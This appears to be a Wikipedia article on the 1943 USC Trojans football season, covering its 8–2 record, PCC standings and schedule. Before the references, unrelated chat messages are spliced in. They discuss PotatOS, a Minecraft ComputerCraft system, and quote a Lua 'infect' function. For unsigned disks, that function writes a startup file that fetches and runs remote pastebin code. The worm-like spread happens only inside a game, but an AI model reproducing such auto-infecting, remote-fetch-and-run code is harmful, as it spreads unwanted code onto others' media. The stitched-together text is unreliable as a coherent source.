1943 USC Trojans football team

The 1943 USC Trojans football team represented the University of Southern California (USC) in the 1943 college football season. In their second year under head coach Jeff Cravath, the Trojans compiled an 8–2 record (5–0 against conference opponents), won the Pacific Coast Conference championship, defeated Washington in the 1944 Rose Bowl, and outscored their opponents by a combined total of 155 to 58.[1]

1943 USC Trojans football
PCC champion
Rose Bowl champion
Rose Bowl, W 29–0 vs. Washington
ConferencePacific Coast Conference
1943 record8–2 (5–0 PCC)
Head coachJeff Cravath (2nd season)
Home stadiumLos Angeles Memorial Coliseum
1943 Pacific Coast Conference football standings
Conf  Overall
TeamW L T  W L T
USC $ 5 0 0  8 2 0
California 2 2 0  4 6 0
No. 12 Washington 0 1 0  4 1 0
UCLA 0 4 0  1 8 0
  • $ Conference champion
Rankings from AP Poll

Schedule

DateOpponentRankSiteResultAttendance
September 25at UCLA
W 20–050,000
October 2at CaliforniaW 7–035,000
October 9Saint Mary's Pre-Flight*No. 10
  • Los Angeles Memorial Coliseum
  • Los Angeles, CA
W 13–030,000
October 16at San Francisco*No. 8San Francisco, CAW 34–06,000
October 23No. 6 Pacific (CA)*No. 7
  • Los Angeles Memorial Coliseum
  • Los Angeles, CA
W 6–065,000
October 30No. 20 CaliforniaNo. 5
  • Los Angeles Memorial Coliseum
  • Los Angeles, CA
W 13–045,000
November 6San Diego NAS*No. 4San Diego, CAL 7–106,000
November 13No. 15 March Field*No. 9
  • Los Angeles Memorial Coliseum
  • Los Angeles, CA
L 0–3530,000
November 27UCLA
  • Los Angeles Memorial Coliseum
  • Los Angeles, CA (Battle for the Victory Bell)
W 26–1335,000
January 1, 1944vs. No. 12 Washington
W 29–068,000
  • *Non-conference game
  • Homecoming
  • Rankings from AP Poll released prior to the game
gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?

References

  1. "Southern California Yearly Results (1940-1944)". College Football Data Warehouse. David DeLassus. Retrieved July 20, 2015.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.